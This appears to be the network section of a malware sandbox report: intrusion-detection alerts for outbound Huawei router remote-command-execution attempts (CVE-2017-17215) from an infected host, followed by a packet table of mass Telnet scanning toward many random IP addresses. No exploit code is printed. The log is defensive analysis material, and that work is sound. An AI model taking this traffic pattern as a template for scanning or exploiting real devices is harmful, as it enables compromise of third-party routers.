                                              192.168.2.14156.235.105.1442600372152829579 11/23/23-05:15:54.722537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4260037215192.168.2.14156.235.105.14
                                              192.168.2.1441.250.5.1347142372152835222 11/23/23-05:15:42.846567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4714237215192.168.2.1441.250.5.13
                                              192.168.2.14156.77.134.14351248372152835222 11/23/23-05:15:05.129392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5124837215192.168.2.14156.77.134.143
                                              192.168.2.14156.254.71.3442532372152835222 11/23/23-05:17:24.534405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4253237215192.168.2.14156.254.71.34
                                              192.168.2.14156.241.8.2750106372152835222 11/23/23-05:17:57.691469TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5010637215192.168.2.14156.241.8.27
                                              192.168.2.14156.253.39.9834608372152829579 11/23/23-05:16:18.108171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3460837215192.168.2.14156.253.39.98
                                              192.168.2.14156.247.29.2743164372152835222 11/23/23-05:18:21.980352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4316437215192.168.2.14156.247.29.27
                                              192.168.2.14156.226.14.11938754372152835222 11/23/23-05:15:39.627689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3875437215192.168.2.14156.226.14.119
                                              192.168.2.1441.232.230.17654828372152835222 11/23/23-05:17:24.789059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5482837215192.168.2.1441.232.230.176
                                              192.168.2.1441.62.237.6236050372152829579 11/23/23-05:18:15.887851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3605037215192.168.2.1441.62.237.62
                                              192.168.2.14156.254.88.14835652372152835222 11/23/23-05:14:51.327318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3565237215192.168.2.14156.254.88.148
                                              192.168.2.14156.226.14.11938754372152829579 11/23/23-05:15:39.627689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3875437215192.168.2.14156.226.14.119
                                              192.168.2.1441.42.88.859458372152829579 11/23/23-05:15:52.366087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5945837215192.168.2.1441.42.88.8
                                              192.168.2.1441.239.73.17333132372152829579 11/23/23-05:17:13.165158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3313237215192.168.2.1441.239.73.173
                                              192.168.2.14156.253.40.24140022372152829579 11/23/23-05:18:16.917737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4002237215192.168.2.14156.253.40.241
                                              192.168.2.14156.230.23.5352056372152829579 11/23/23-05:16:09.442783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5205637215192.168.2.14156.230.23.53
                                              192.168.2.14156.247.29.2743164372152829579 11/23/23-05:18:21.980352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4316437215192.168.2.14156.247.29.27
                                              192.168.2.14156.235.96.4444514372152829579 11/23/23-05:17:46.506351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4451437215192.168.2.14156.235.96.44
                                              192.168.2.14156.254.79.12239356372152835222 11/23/23-05:17:58.567581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3935637215192.168.2.14156.254.79.122
                                              192.168.2.14156.241.92.9541782372152835222 11/23/23-05:18:13.638203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4178237215192.168.2.14156.241.92.95
                                              192.168.2.14156.241.8.2750106372152829579 11/23/23-05:17:57.691469TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5010637215192.168.2.14156.241.8.27
                                              192.168.2.14156.241.89.17151982372152829579 11/23/23-05:17:17.815543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5198237215192.168.2.14156.241.89.171
                                              192.168.2.14156.241.82.21751080372152835222 11/23/23-05:17:32.493865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5108037215192.168.2.14156.241.82.217
                                              192.168.2.14156.241.85.3256464372152829579 11/23/23-05:18:08.516352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5646437215192.168.2.14156.241.85.32
                                              192.168.2.1441.239.35.5851906372152829579 11/23/23-05:18:08.363086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5190637215192.168.2.1441.239.35.58
                                              192.168.2.14156.235.96.4444514372152835222 11/23/23-05:17:46.506351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4451437215192.168.2.14156.235.96.44
                                              192.168.2.14156.254.85.18540842372152829579 11/23/23-05:15:00.708035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4084237215192.168.2.14156.254.85.185
                                              192.168.2.14156.226.11.9043244372152835222 11/23/23-05:17:54.238534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4324437215192.168.2.14156.226.11.90
                                              192.168.2.14156.241.85.3256464372152835222 11/23/23-05:18:08.516352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5646437215192.168.2.14156.241.85.32
                                              192.168.2.14156.235.105.1442600372152835222 11/23/23-05:15:54.722537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4260037215192.168.2.14156.235.105.14
                                              192.168.2.14156.241.15.15540606372152829579 11/23/23-05:17:10.591775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4060637215192.168.2.14156.241.15.155
                                              192.168.2.14197.3.213.25339794372152835222 11/23/23-05:18:17.098302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3979437215192.168.2.14197.3.213.253
                                              192.168.2.14156.254.79.12239356372152829579 11/23/23-05:17:58.567581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3935637215192.168.2.14156.254.79.122
                                              192.168.2.1441.40.32.14044612372152829579 11/23/23-05:18:23.200632TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4461237215192.168.2.1441.40.32.140
                                              192.168.2.14156.77.134.14351248372152829579 11/23/23-05:15:05.129392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5124837215192.168.2.14156.77.134.143
                                              192.168.2.1441.232.230.17654828372152829579 11/23/23-05:17:24.789059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5482837215192.168.2.1441.232.230.176
                                              192.168.2.14156.241.92.16460320372152835222 11/23/23-05:16:16.383093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6032037215192.168.2.14156.241.92.164
                                              192.168.2.14156.253.39.9834608372152835222 11/23/23-05:16:18.108171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3460837215192.168.2.14156.253.39.98
                                              192.168.2.1441.42.86.21650140372152835222 11/23/23-05:18:06.959996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5014037215192.168.2.1441.42.86.216
                                              • Total Packets: 9785
                                              • 37215 undefined
                                              • 8080 undefined
                                              • 45 undefined
                                              • 23 (Telnet)
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 23, 2023 05:14:47.987801075 CET4782823192.168.2.14156.121.83.145
                                              Nov 23, 2023 05:14:47.988279104 CET4782823192.168.2.14180.111.212.145
                                              Nov 23, 2023 05:14:47.988293886 CET4782823192.168.2.14151.215.68.51
                                              Nov 23, 2023 05:14:47.988306999 CET4782823192.168.2.14139.184.33.157
                                              Nov 23, 2023 05:14:47.988306999 CET4782823192.168.2.14185.146.179.43
                                              Nov 23, 2023 05:14:47.988329887 CET4782823192.168.2.14165.248.77.105
                                              Nov 23, 2023 05:14:47.988333941 CET4782823192.168.2.1446.73.191.77
                                              Nov 23, 2023 05:14:47.988333941 CET4782823192.168.2.14210.188.3.131
                                              Nov 23, 2023 05:14:47.988333941 CET4782823192.168.2.14187.68.4.191
                                              Nov 23, 2023 05:14:47.988341093 CET4782823192.168.2.1477.137.10.147
                                              Nov 23, 2023 05:14:47.988348961 CET4782823192.168.2.1443.50.105.235
                                              Nov 23, 2023 05:14:47.988388062 CET4782823192.168.2.14174.203.55.229
                                              Nov 23, 2023 05:14:47.988404036 CET4782823192.168.2.14181.154.31.31
                                              Nov 23, 2023 05:14:47.988404036 CET4782823192.168.2.1490.234.230.105
                                              Nov 23, 2023 05:14:47.988444090 CET4782823192.168.2.1496.158.178.166
                                              Nov 23, 2023 05:14:47.988471985 CET4782823192.168.2.14148.124.86.213
                                              Nov 23, 2023 05:14:47.988471985 CET4782823192.168.2.14160.53.127.172
                                              Nov 23, 2023 05:14:47.988477945 CET4782823192.168.2.1470.50.101.49
                                              Nov 23, 2023 05:14:47.988481045 CET4782823192.168.2.1454.107.48.226
                                              Nov 23, 2023 05:14:47.988481045 CET4782823192.168.2.1417.58.78.239
                                              Nov 23, 2023 05:14:47.988481045 CET4782823192.168.2.1490.44.94.52
                                              Nov 23, 2023 05:14:47.988497019 CET4782823192.168.2.142.73.8.0
                                              Nov 23, 2023 05:14:47.988511086 CET4782823192.168.2.14196.58.203.51
                                              Nov 23, 2023 05:14:47.988547087 CET4782823192.168.2.1492.49.189.23
                                              Nov 23, 2023 05:14:47.988550901 CET4782823192.168.2.1434.8.40.39
                                              Nov 23, 2023 05:14:47.988554001 CET4782823192.168.2.14204.233.188.28
                                              Nov 23, 2023 05:14:47.988554001 CET4782823192.168.2.14193.116.111.150
                                              Nov 23, 2023 05:14:47.988573074 CET4782823192.168.2.1440.3.197.245
                                              Nov 23, 2023 05:14:47.988604069 CET4782823192.168.2.1489.175.148.26
                                              Nov 23, 2023 05:14:47.988606930 CET4782823192.168.2.1487.213.88.69
                                              Nov 23, 2023 05:14:47.988616943 CET4782823192.168.2.14201.45.51.92
                                              Nov 23, 2023 05:14:47.988635063 CET4782823192.168.2.1413.104.72.168
                                              Nov 23, 2023 05:14:47.988683939 CET4782823192.168.2.14182.57.117.34
                                              Nov 23, 2023 05:14:47.988683939 CET4782823192.168.2.14194.66.207.127
                                              Nov 23, 2023 05:14:47.988706112 CET4782823192.168.2.14121.30.43.144
                                              Nov 23, 2023 05:14:47.988739014 CET4782823192.168.2.14145.101.4.99
                                              Nov 23, 2023 05:14:47.988739014 CET4782823192.168.2.14253.214.252.75
                                              Nov 23, 2023 05:14:47.988739014 CET4782823192.168.2.14164.163.117.5
                                              Nov 23, 2023 05:14:47.988745928 CET4782823192.168.2.14204.185.235.33
                                              Nov 23, 2023 05:14:47.988749027 CET4782823192.168.2.14173.75.140.167
                                              Nov 23, 2023 05:14:47.988755941 CET4782823192.168.2.14107.74.59.3
                                              Nov 23, 2023 05:14:47.988758087 CET4782823192.168.2.1413.247.216.247
                                              Nov 23, 2023 05:14:47.988768101 CET4782823192.168.2.14189.172.252.102
                                              Nov 23, 2023 05:14:47.988769054 CET4782823192.168.2.1437.4.9.68
                                              Nov 23, 2023 05:14:47.988770962 CET4782823192.168.2.1447.82.221.17
                                              Nov 23, 2023 05:14:47.988857031 CET4782823192.168.2.14111.201.242.38
                                              Nov 23, 2023 05:14:47.988857031 CET4782823192.168.2.1499.167.13.105
                                              Nov 23, 2023 05:14:47.988857031 CET4782823192.168.2.14176.168.220.194
                                              Nov 23, 2023 05:14:47.988858938 CET4782823192.168.2.14192.212.190.115
                                              Nov 23, 2023 05:14:47.988859892 CET4782823192.168.2.1474.105.208.195
                                              Nov 23, 2023 05:14:47.988859892 CET4782823192.168.2.14254.65.154.145
                                              Nov 23, 2023 05:14:47.988861084 CET4782823192.168.2.1417.179.132.196
                                              Nov 23, 2023 05:14:47.988861084 CET4782823192.168.2.149.6.211.232
                                              Nov 23, 2023 05:14:47.988861084 CET4782823192.168.2.1444.85.85.203
                                              Nov 23, 2023 05:14:47.988868952 CET4782823192.168.2.14149.2.197.160
                                              Nov 23, 2023 05:14:47.988868952 CET4782823192.168.2.14250.48.107.38
                                              Nov 23, 2023 05:14:47.988874912 CET4782823192.168.2.14255.55.239.48
                                              Nov 23, 2023 05:14:47.988874912 CET4782823192.168.2.14133.201.170.242
                                              Nov 23, 2023 05:14:47.988878012 CET4782823192.168.2.14199.42.165.248
                                              Nov 23, 2023 05:14:47.988882065 CET4782823192.168.2.14100.200.241.84
                                              Nov 23, 2023 05:14:47.988898039 CET4782823192.168.2.1479.71.242.132
                                              Nov 23, 2023 05:14:47.988902092 CET4782823192.168.2.14210.103.184.0
                                              Nov 23, 2023 05:14:47.988912106 CET4782823192.168.2.14179.211.43.168
                                              Nov 23, 2023 05:14:47.988912106 CET4782823192.168.2.1413.124.220.118
                                              Nov 23, 2023 05:14:47.988912106 CET4782823192.168.2.14193.135.24.152
                                              Nov 23, 2023 05:14:47.988915920 CET4782823192.168.2.1457.22.128.224
                                              Nov 23, 2023 05:14:47.988922119 CET4782823192.168.2.14241.88.163.158
                                              Nov 23, 2023 05:14:47.988926888 CET4782823192.168.2.1444.239.166.23
                                              Nov 23, 2023 05:14:47.988969088 CET4782823192.168.2.14197.96.52.18
                                              Nov 23, 2023 05:14:47.988972902 CET4782823192.168.2.14221.40.233.144
                                              Nov 23, 2023 05:14:47.988974094 CET4782823192.168.2.14247.162.28.218
                                              Nov 23, 2023 05:14:47.989022017 CET4782823192.168.2.1469.106.193.10
                                              Nov 23, 2023 05:14:47.989032984 CET4782823192.168.2.14148.193.223.255
                                              Nov 23, 2023 05:14:47.989032984 CET4782823192.168.2.14181.179.0.238
                                              Nov 23, 2023 05:14:47.989032984 CET4782823192.168.2.14182.26.37.96
                                              Nov 23, 2023 05:14:47.989037037 CET4782823192.168.2.14151.225.114.63
                                              Nov 23, 2023 05:14:47.989041090 CET4782823192.168.2.14155.243.99.160
                                              Nov 23, 2023 05:14:47.989041090 CET4782823192.168.2.1418.102.173.6
                                              Nov 23, 2023 05:14:47.989048004 CET4782823192.168.2.14124.237.95.221
                                              Nov 23, 2023 05:14:47.989067078 CET4782823192.168.2.1493.120.43.180
                                              Nov 23, 2023 05:14:47.989104986 CET4782823192.168.2.1419.245.19.96
                                              Nov 23, 2023 05:14:47.989104986 CET4782823192.168.2.14200.8.120.251
                                              Nov 23, 2023 05:14:47.989108086 CET4782823192.168.2.1436.202.86.87
                                              Nov 23, 2023 05:14:47.989109039 CET4782823192.168.2.1496.153.205.139
                                              Nov 23, 2023 05:14:47.989110947 CET4782823192.168.2.14119.110.248.39
                                              Nov 23, 2023 05:14:47.989114046 CET4782823192.168.2.1480.254.244.226
                                              Nov 23, 2023 05:14:47.989120007 CET4782823192.168.2.14187.208.37.201
                                              Nov 23, 2023 05:14:47.989129066 CET4782823192.168.2.1446.237.146.98
                                              Nov 23, 2023 05:14:47.989196062 CET4782823192.168.2.14165.68.51.240
                                              Nov 23, 2023 05:14:47.989200115 CET4782823192.168.2.14187.150.168.45
                                              Nov 23, 2023 05:14:47.989202976 CET4782823192.168.2.14248.201.200.59
                                              Nov 23, 2023 05:14:47.989207983 CET4782823192.168.2.1467.179.135.46
                                              Nov 23, 2023 05:14:47.989207983 CET4782823192.168.2.14197.93.58.178
                                              Nov 23, 2023 05:14:47.989209890 CET4782823192.168.2.14197.230.95.52
                                              Nov 23, 2023 05:14:47.989223957 CET4782823192.168.2.1419.50.130.121
                                              Nov 23, 2023 05:14:47.989232063 CET4782823192.168.2.14162.60.107.235
                                              Nov 23, 2023 05:14:47.989234924 CET4782823192.168.2.14209.10.163.170
                                              Nov 23, 2023 05:14:47.989252090 CET4782823192.168.2.1466.47.130.11
                                              Nov 23, 2023 05:14:47.989293098 CET4782823192.168.2.14147.46.74.197
                                              Nov 23, 2023 05:14:47.989305973 CET4782823192.168.2.14124.180.16.19
                                              Nov 23, 2023 05:14:47.989306927 CET4782823192.168.2.1491.90.212.224
                                              Nov 23, 2023 05:14:47.989314079 CET4782823192.168.2.1458.89.137.20
                                              Nov 23, 2023 05:14:47.989377975 CET4782823192.168.2.1420.132.147.7
                                              Nov 23, 2023 05:14:47.989392996 CET4782823192.168.2.14170.136.94.34
                                              Nov 23, 2023 05:14:47.989392996 CET4782823192.168.2.1474.176.32.237
                                              Nov 23, 2023 05:14:47.989394903 CET4782823192.168.2.14124.152.247.2
                                              Nov 23, 2023 05:14:47.989398003 CET4782823192.168.2.14108.155.191.169
                                              Nov 23, 2023 05:14:47.989398003 CET4782823192.168.2.14205.133.140.243
                                              Nov 23, 2023 05:14:47.989397049 CET4782823192.168.2.1459.67.135.184
                                              Nov 23, 2023 05:14:47.989397049 CET4782823192.168.2.1446.237.66.103
                                              Nov 23, 2023 05:14:47.989403963 CET4782823192.168.2.14249.76.187.190
                                              Nov 23, 2023 05:14:47.989413023 CET4782823192.168.2.1491.223.30.159
                                              Nov 23, 2023 05:14:47.989420891 CET4782823192.168.2.14198.8.9.184
                                              Nov 23, 2023 05:14:47.989420891 CET4782823192.168.2.14154.51.32.39
                                              Nov 23, 2023 05:14:47.989427090 CET4782823192.168.2.1460.69.190.80
                                              Nov 23, 2023 05:14:47.989427090 CET4782823192.168.2.14195.220.223.197
                                              Nov 23, 2023 05:14:47.989428997 CET4782823192.168.2.1439.1.43.110
                                              Nov 23, 2023 05:14:47.989428997 CET4782823192.168.2.14194.23.27.104
                                              Nov 23, 2023 05:14:47.989430904 CET4782823192.168.2.14125.222.217.75
                                              Nov 23, 2023 05:14:47.989430904 CET4782823192.168.2.14241.168.223.136
                                              Nov 23, 2023 05:14:47.989430904 CET4782823192.168.2.14202.110.174.200
                                              Nov 23, 2023 05:14:47.989444971 CET4782823192.168.2.14143.0.182.212
                                              Nov 23, 2023 05:14:47.989449978 CET4782823192.168.2.14147.10.200.66
                                              Nov 23, 2023 05:14:47.989456892 CET4782823192.168.2.1479.164.20.73
                                              Nov 23, 2023 05:14:47.989470005 CET4782823192.168.2.1413.111.93.74
                                              Nov 23, 2023 05:14:47.989475012 CET4782823192.168.2.14249.43.243.203
                                              Nov 23, 2023 05:14:47.989483118 CET4782823192.168.2.1417.162.143.210
                                              Nov 23, 2023 05:14:47.989485979 CET4782823192.168.2.1454.60.72.3
                                              Nov 23, 2023 05:14:47.989566088 CET4782823192.168.2.14148.176.162.10
                                              Nov 23, 2023 05:14:47.989566088 CET4782823192.168.2.14197.32.165.239
                                              Nov 23, 2023 05:14:47.989567995 CET4782823192.168.2.14221.128.73.110
                                              Nov 23, 2023 05:14:47.989567995 CET4782823192.168.2.1463.175.224.156
                                              Nov 23, 2023 05:14:47.989569902 CET4782823192.168.2.14194.230.223.194
                                              Nov 23, 2023 05:14:47.989571095 CET4782823192.168.2.1491.152.250.254
                                              Nov 23, 2023 05:14:47.989572048 CET4782823192.168.2.1444.216.13.239
                                              Nov 23, 2023 05:14:47.989572048 CET4782823192.168.2.14204.52.131.215
                                              Nov 23, 2023 05:14:47.989572048 CET4782823192.168.2.145.30.51.9
                                              Nov 23, 2023 05:14:47.989573956 CET4782823192.168.2.1475.214.30.22
                                              Nov 23, 2023 05:14:47.989582062 CET4782823192.168.2.14121.161.109.139
                                              Nov 23, 2023 05:14:47.989582062 CET4782823192.168.2.14255.81.34.8
                                              Nov 23, 2023 05:14:47.989583015 CET4782823192.168.2.1443.126.8.156
                                              Nov 23, 2023 05:14:47.989583969 CET4782823192.168.2.14251.58.90.60
                                              Nov 23, 2023 05:14:47.989588022 CET4782823192.168.2.14102.178.76.244
                                              Nov 23, 2023 05:14:47.989598036 CET4782823192.168.2.1487.26.243.4
                                              Nov 23, 2023 05:14:47.989598989 CET4782823192.168.2.141.239.250.165
                                              Nov 23, 2023 05:14:47.989598989 CET4782823192.168.2.14100.237.90.189
                                              Nov 23, 2023 05:14:47.989600897 CET4782823192.168.2.14130.13.66.15
                                              Nov 23, 2023 05:14:47.989605904 CET4782823192.168.2.1432.79.154.246
                                              Nov 23, 2023 05:14:47.989610910 CET4782823192.168.2.1475.156.39.102
                                              Nov 23, 2023 05:14:47.989620924 CET4782823192.168.2.14188.24.89.126
                                              Nov 23, 2023 05:14:47.989620924 CET4782823192.168.2.1465.69.6.33
                                              Nov 23, 2023 05:14:47.989620924 CET4782823192.168.2.14199.104.225.58
                                              Nov 23, 2023 05:14:47.989620924 CET4782823192.168.2.1431.246.30.200
                                              Nov 23, 2023 05:14:47.989629030 CET4782823192.168.2.1419.214.18.69
                                              Nov 23, 2023 05:14:47.989629030 CET4782823192.168.2.14193.47.41.3
                                              Nov 23, 2023 05:14:47.989634037 CET4782823192.168.2.14102.95.7.161
                                              Nov 23, 2023 05:14:47.989794970 CET4782823192.168.2.14148.170.213.127
                                              Nov 23, 2023 05:14:47.989810944 CET4782823192.168.2.14165.0.104.171
                                              Nov 23, 2023 05:14:47.989819050 CET4782823192.168.2.14139.168.222.42
                                              Nov 23, 2023 05:14:47.989830017 CET4782823192.168.2.1414.23.52.100
                                              Nov 23, 2023 05:14:47.989831924 CET4782823192.168.2.1432.190.179.177
                                              Nov 23, 2023 05:14:47.989901066 CET4782823192.168.2.149.125.112.16
                                              Nov 23, 2023 05:14:47.989901066 CET4782823192.168.2.14162.170.164.46
                                              Nov 23, 2023 05:14:47.989902973 CET4782823192.168.2.14208.203.28.194
                                              Nov 23, 2023 05:14:47.989905119 CET4782823192.168.2.14218.226.152.131
                                              Nov 23, 2023 05:14:47.989905119 CET4782823192.168.2.14109.164.156.77
                                              Nov 23, 2023 05:14:47.989907980 CET4782823192.168.2.14199.67.218.209
                                              Nov 23, 2023 05:14:47.989912987 CET4782823192.168.2.14164.147.33.247
                                              Nov 23, 2023 05:14:47.989912987 CET4782823192.168.2.14165.162.244.221
                                              Nov 23, 2023 05:14:47.989916086 CET4782823192.168.2.14156.99.174.58
                                              Nov 23, 2023 05:14:47.989918947 CET4782823192.168.2.14163.154.229.90
                                              Nov 23, 2023 05:14:47.989923000 CET4782823192.168.2.14248.128.111.111
                                              Nov 23, 2023 05:14:47.989928961 CET4782823192.168.2.1495.62.36.233
                                              Nov 23, 2023 05:14:47.989947081 CET4782823192.168.2.14166.21.50.153
                                              Nov 23, 2023 05:14:47.989948988 CET4782823192.168.2.14223.138.5.171
                                              Nov 23, 2023 05:14:47.989948988 CET4782823192.168.2.14204.120.92.202
                                              Nov 23, 2023 05:14:47.989948988 CET4782823192.168.2.1441.143.181.211
                                              Nov 23, 2023 05:14:47.989952087 CET4782823192.168.2.1445.64.191.218
                                              Nov 23, 2023 05:14:47.989952087 CET4782823192.168.2.1441.249.252.107
                                              Nov 23, 2023 05:14:47.989955902 CET4782823192.168.2.1420.228.130.161
                                              Nov 23, 2023 05:14:47.989955902 CET4782823192.168.2.14244.236.135.191
                                              Nov 23, 2023 05:14:47.989965916 CET4782823192.168.2.14170.129.241.19
                                              Nov 23, 2023 05:14:47.989976883 CET4782823192.168.2.14248.12.27.3
                                              Nov 23, 2023 05:14:47.989986897 CET4782823192.168.2.1470.198.37.18
                                              Nov 23, 2023 05:14:47.990001917 CET4782823192.168.2.1472.140.101.215
                                              Nov 23, 2023 05:14:47.990005970 CET4782823192.168.2.1463.243.44.49
                                              Nov 23, 2023 05:14:47.990009069 CET4782823192.168.2.14161.50.119.82
                                              Nov 23, 2023 05:14:47.990010023 CET4782823192.168.2.14216.25.130.82
                                              Nov 23, 2023 05:14:47.990092039 CET4782823192.168.2.14223.108.48.6
                                              Nov 23, 2023 05:14:47.990092039 CET4782823192.168.2.14243.37.233.203
                                              Nov 23, 2023 05:14:47.990096092 CET4782823192.168.2.14113.14.149.147
                                              Nov 23, 2023 05:14:47.990097046 CET4782823192.168.2.14136.240.54.112
                                              Nov 23, 2023 05:14:47.990097046 CET4782823192.168.2.14244.216.154.164
                                              Nov 23, 2023 05:14:47.990101099 CET4782823192.168.2.14213.240.135.10
                                              Nov 23, 2023 05:14:47.990101099 CET4782823192.168.2.1486.43.48.247
                                              Nov 23, 2023 05:14:47.990101099 CET4782823192.168.2.14240.193.220.161
                                              Nov 23, 2023 05:14:47.990101099 CET4782823192.168.2.14173.211.86.191
                                              Nov 23, 2023 05:14:47.990107059 CET4782823192.168.2.14136.156.230.1
                                              Nov 23, 2023 05:14:47.990107059 CET4782823192.168.2.14152.175.36.234
                                              Nov 23, 2023 05:14:47.990107059 CET4782823192.168.2.14243.165.25.195
                                              Nov 23, 2023 05:14:47.990112066 CET4782823192.168.2.1448.255.124.27
                                              Nov 23, 2023 05:14:47.990118980 CET4782823192.168.2.1453.11.124.61
                                              Nov 23, 2023 05:14:47.990118980 CET4782823192.168.2.14135.239.41.237
                                              Nov 23, 2023 05:14:47.990120888 CET4782823192.168.2.14243.86.220.133
                                              Nov 23, 2023 05:14:47.990122080 CET4782823192.168.2.14202.119.183.64
                                              Nov 23, 2023 05:14:47.990122080 CET4782823192.168.2.14109.157.127.69
                                              Nov 23, 2023 05:14:47.990123034 CET4782823192.168.2.1437.124.242.167
                                              Nov 23, 2023 05:14:47.990124941 CET4782823192.168.2.14177.154.136.34
                                              Nov 23, 2023 05:14:47.990128994 CET4782823192.168.2.14241.19.171.87
                                              Nov 23, 2023 05:14:47.990133047 CET4782823192.168.2.141.180.172.53
                                              Nov 23, 2023 05:14:47.990144968 CET4782823192.168.2.14197.68.59.171
                                              Nov 23, 2023 05:14:47.990144968 CET4782823192.168.2.14250.125.85.152
                                              Nov 23, 2023 05:14:47.990147114 CET4782823192.168.2.14113.68.67.182
                                              Nov 23, 2023 05:14:47.990150928 CET4782823192.168.2.1424.35.175.3
                                              Nov 23, 2023 05:14:47.990155935 CET4782823192.168.2.14177.89.71.132
                                              Nov 23, 2023 05:14:47.990155935 CET4782823192.168.2.1497.112.228.151
                                              Nov 23, 2023 05:14:47.990155935 CET4782823192.168.2.1493.92.133.19
                                              Nov 23, 2023 05:14:47.990155935 CET4782823192.168.2.14159.74.42.208
                                              Nov 23, 2023 05:14:47.990170002 CET4782823192.168.2.14209.22.63.13
                                              Nov 23, 2023 05:14:47.990186930 CET4782823192.168.2.1480.66.134.160
                                              Nov 23, 2023 05:14:47.990195990 CET4782823192.168.2.14252.123.111.55
                                              Nov 23, 2023 05:14:47.990202904 CET4782823192.168.2.1447.45.247.205
                                              Nov 23, 2023 05:14:47.990206957 CET4782823192.168.2.14162.157.133.72
                                              Nov 23, 2023 05:14:47.990286112 CET4782823192.168.2.1480.156.184.125
                                              Nov 23, 2023 05:14:47.990289927 CET4782823192.168.2.14147.215.236.198
                                              Nov 23, 2023 05:14:47.990289927 CET4782823192.168.2.14119.221.88.86
                                              Nov 23, 2023 05:14:47.990289927 CET4782823192.168.2.14139.211.176.92
                                              Nov 23, 2023 05:14:47.990303993 CET4782823192.168.2.14104.44.237.230
                                              Nov 23, 2023 05:14:47.990303993 CET4782823192.168.2.1489.105.251.170
                                              Nov 23, 2023 05:14:47.990305901 CET4782823192.168.2.14243.77.182.208
                                              Nov 23, 2023 05:14:47.990307093 CET4782823192.168.2.14200.125.122.69
                                              Nov 23, 2023 05:14:47.990307093 CET4782823192.168.2.14179.27.197.197
                                              Nov 23, 2023 05:14:47.990307093 CET4782823192.168.2.1424.15.113.69
                                              Nov 23, 2023 05:14:47.990312099 CET4782823192.168.2.1492.201.232.141
                                              Nov 23, 2023 05:14:47.990313053 CET4782823192.168.2.14176.140.76.220
                                              Nov 23, 2023 05:14:47.990313053 CET4782823192.168.2.14200.210.34.11
                                              Nov 23, 2023 05:14:47.990317106 CET4782823192.168.2.1467.217.34.133
                                              Nov 23, 2023 05:14:47.990341902 CET4782823192.168.2.14145.106.92.163
                                              Nov 23, 2023 05:14:47.990345001 CET4782823192.168.2.14189.167.231.189
                                              Nov 23, 2023 05:14:47.990345001 CET4782823192.168.2.14118.71.146.131
                                              Nov 23, 2023 05:14:47.990346909 CET4782823192.168.2.14201.102.72.198
                                              Nov 23, 2023 05:14:47.990346909 CET4782823192.168.2.14164.153.96.161
                                              Nov 23, 2023 05:14:47.990370035 CET4782823192.168.2.14206.42.194.217
                                              Nov 23, 2023 05:14:47.990370989 CET4782823192.168.2.14223.116.91.26
                                              Nov 23, 2023 05:14:47.990370035 CET4782823192.168.2.14250.244.206.157
                                              Nov 23, 2023 05:14:47.990380049 CET4782823192.168.2.14187.192.127.90
                                              Nov 23, 2023 05:14:47.990384102 CET4782823192.168.2.1445.228.91.95
                                              Nov 23, 2023 05:14:47.990392923 CET4782823192.168.2.14107.177.6.13
                                              Nov 23, 2023 05:14:47.990466118 CET4782823192.168.2.14103.193.141.220
                                              Nov 23, 2023 05:14:47.990468979 CET4782823192.168.2.14248.102.126.141
                                              Nov 23, 2023 05:14:47.990470886 CET4782823192.168.2.14211.174.30.206
                                              Nov 23, 2023 05:14:47.990472078 CET4782823192.168.2.1441.98.205.233
                                              Nov 23, 2023 05:14:47.990470886 CET4782823192.168.2.14194.200.242.235
                                              Nov 23, 2023 05:14:47.990472078 CET4782823192.168.2.1447.39.47.98
                                              Nov 23, 2023 05:14:47.990470886 CET4782823192.168.2.14192.60.68.15
